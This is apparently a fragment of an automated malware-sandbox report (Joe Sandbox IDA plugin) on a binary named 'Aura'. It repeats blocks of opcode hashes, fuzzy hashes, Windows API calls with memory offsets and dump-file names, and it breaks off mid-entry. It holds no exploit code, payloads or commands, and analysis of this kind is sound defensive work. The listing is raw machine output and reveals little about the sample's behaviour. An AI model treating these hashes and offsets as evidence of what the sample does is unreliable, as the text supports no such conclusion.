                                                                                                                                                                                                                                                    • Opcode ID: a267fea05cb5f14829236ccd62afcf1f7134749aa66c47cd59349db3de10220c
                                                                                                                                                                                                                                                    • Instruction ID: 6c450ab48b6b279a04ed5a8b479028a4ae7de88971418e83b45332b0bc06d8f0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a267fea05cb5f14829236ccd62afcf1f7134749aa66c47cd59349db3de10220c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F11C2362007019FEB289F79C891AFEB791FB81768B14442DE98787B42E771A943CB40
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 000C19B4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: 4ee1201158d4ede33fb4aa9f918b977e2e662d5fc7076785fa9b1d6917af86e3
                                                                                                                                                                                                                                                    • Instruction ID: 3f9f280611518e9e5e68ba8148436031ba2c03bfa7c33ee189e6816235f1b9de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ee1201158d4ede33fb4aa9f918b977e2e662d5fc7076785fa9b1d6917af86e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A111A032611206ABEB14AB68DC52EFE77ECEF06710B10417AE902D7183EB38ED059B50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,000C179C,00000000,00000000,?), ref: 000C1B39
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                                                                                                                    • Opcode ID: c300610c444f0563e25e5e6b7fa7ee8b91d568a37ed22893bb42acf6a26c0f1c
                                                                                                                                                                                                                                                    • Instruction ID: cae203e37391c9160692f2db315e326087dd8d52984d651e4dc9dbd961656216
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c300610c444f0563e25e5e6b7fa7ee8b91d568a37ed22893bb42acf6a26c0f1c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF01A232610112ABDB285B648805FFE77A8EB81754F15442DED06A3181FB74EE41CAE0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(000C1840,00000001,?,?,-00000050,?,000C132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 000C181D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: f877a144e4eb891c482e4c31c07aa1e0e283c3de1c94107663aa12a2776d69cc
                                                                                                                                                                                                                                                    • Instruction ID: fc536c640d69d52a9b11048b30867011722dc9e04734c04632144488fac2905d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f877a144e4eb891c482e4c31c07aa1e0e283c3de1c94107663aa12a2776d69cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0C2362043045FDB245F79D881FFE7BD1EF82768B15842DFA454B692DAB19C42C650
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000B80E1: EnterCriticalSection.KERNEL32(?,?,000BC5F8,?,000D9290,00000008,000BC4EA,?,?,?), ref: 000B80F0
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(000BD1B0,00000001,000D9310,0000000C,000BCB11,-00000050), ref: 000BD1F5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                                                                                                                    • Opcode ID: 6948ff16591206111b0ace9f17d2e4f409abcbe608c36f079ee03b427b9efecd
                                                                                                                                                                                                                                                    • Instruction ID: d730db822675dc21a7eab78d9b4fbb6f53a977d6e93813eac6bffd157a260c6e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6948ff16591206111b0ace9f17d2e4f409abcbe608c36f079ee03b427b9efecd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2F03C72A01304DFE710DF98E842BD9B7E0EB05721F10842BF9109B2A1DB794A40CF51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: GetLastError.KERNEL32(?,?,000B5495,000D8E38,0000000C), ref: 000BC16E
                                                                                                                                                                                                                                                      • Part of subcall function 000BC16A: SetLastError.KERNEL32(00000000), ref: 000BC210
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(000C1960,00000001,?,?,?,000C1385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 000C194C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                                                                                                                    • Opcode ID: e9c5dcae50c177cce89181495a898ff5192959d9896fa905b056a9e3e9af2110
                                                                                                                                                                                                                                                    • Instruction ID: 708ca4502a390a6b44ad3f78fd12729fd8e24ead5619738c95aedc3022fdffe4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9c5dcae50c177cce89181495a898ff5192959d9896fa905b056a9e3e9af2110
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0EC3530020557DB149F39DC65BBA7FA4EFC3B50F06405DEA058B152C6759842C7A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,000B6E33,?,20001004,00000000,00000002,?,?,000B5D3D), ref: 000BCC49
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: bd6c5fcf17208a59b7e5b3160001f0dea996cdac23f75bf9c2ae9cd3ea7d9a14
                                                                                                                                                                                                                                                    • Instruction ID: d13ffc4c425f6f220956d8e28aaf34dd35b8065df648d335c6e7b518f241741c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd6c5fcf17208a59b7e5b3160001f0dea996cdac23f75bf9c2ae9cd3ea7d9a14
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBE0863150122CBBDF122F60ED04EEE7F1AEF44750F048022FD0566221CB368D21ABE4
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 000AF8E2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: bf4874aacd34986021364eeb5a071eb0b4a6030f6321c4cf38b34a72a098a64b
                                                                                                                                                                                                                                                    • Instruction ID: a51d2cd6f2b55a3335ab3e70c5225f60eeeed47529eae9e6c95d16db4e742a4a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf4874aacd34986021364eeb5a071eb0b4a6030f6321c4cf38b34a72a098a64b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                    • Opcode ID: 42074ee0db5135c99266d194bc94bda69c22faca12997f8e7f84b00b300b07b6
                                                                                                                                                                                                                                                    • Instruction ID: 7b2120fe8cc6f53571ce0d0d37b8037463ce9e218e245d8181d78c53f8d7caa3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42074ee0db5135c99266d194bc94bda69c22faca12997f8e7f84b00b300b07b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BA001706132028BA7408F36AE192193BAAAB45AD1705906BAC45C6164EA399454AF65
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                                                                                                    • Opcode ID: f24bf79f2b5759095e042ea5569965e18a7b26458abdddcaf80db88d63d8c5d6
                                                                                                                                                                                                                                                    • Instruction ID: ac1932932df9da96b2a4b770d9db1d049d3c4618086f4b3cc7bee8ddb1d8e0d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f24bf79f2b5759095e042ea5569965e18a7b26458abdddcaf80db88d63d8c5d6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F71B172B0020E9BDF319BA48C81FEE77EA9F4B718F19055DF806A7292E7759C008752
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 000AFE70
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000AFE9C
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 000AFEDB
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000AFEF8
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000AFF37
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 000AFF54
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 000AFF96
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 000AFFB9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: 9f7ad4948132c86201e31540297ca7760bcc67212e67e5eb4ddf84e0e31b8351
                                                                                                                                                                                                                                                    • Instruction ID: 81abeca533dd2c73f11c6fd92891d6deef72f7464d7c3b540154b76a0bd8a9a6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f7ad4948132c86201e31540297ca7760bcc67212e67e5eb4ddf84e0e31b8351
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8517D7260021BAFEB209FE0CC45FBA7BA9EF42794F25443AFD14DA191DB359C118B60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                                                                                                                    • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction ID: ccea9694d1795369d250f4e9c8fe45ed3bafb0bb7afb7b68329ecfba6a856de4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AB13372A00296AFDB219F68CC81BFEBBE5EF59310F148575E944AB283D6749D01C7A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000B0D77
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 000B0D7F
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000B0E08
                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 000B0E33
                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 000B0E88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 0fddde31f4202a5455540aa0440081df78edb257d276843948dbe79b78f15374
                                                                                                                                                                                                                                                    • Instruction ID: 883bde7acbd06bb24a39088a67bc793badc3ab3b63f076a584159abe579ba718
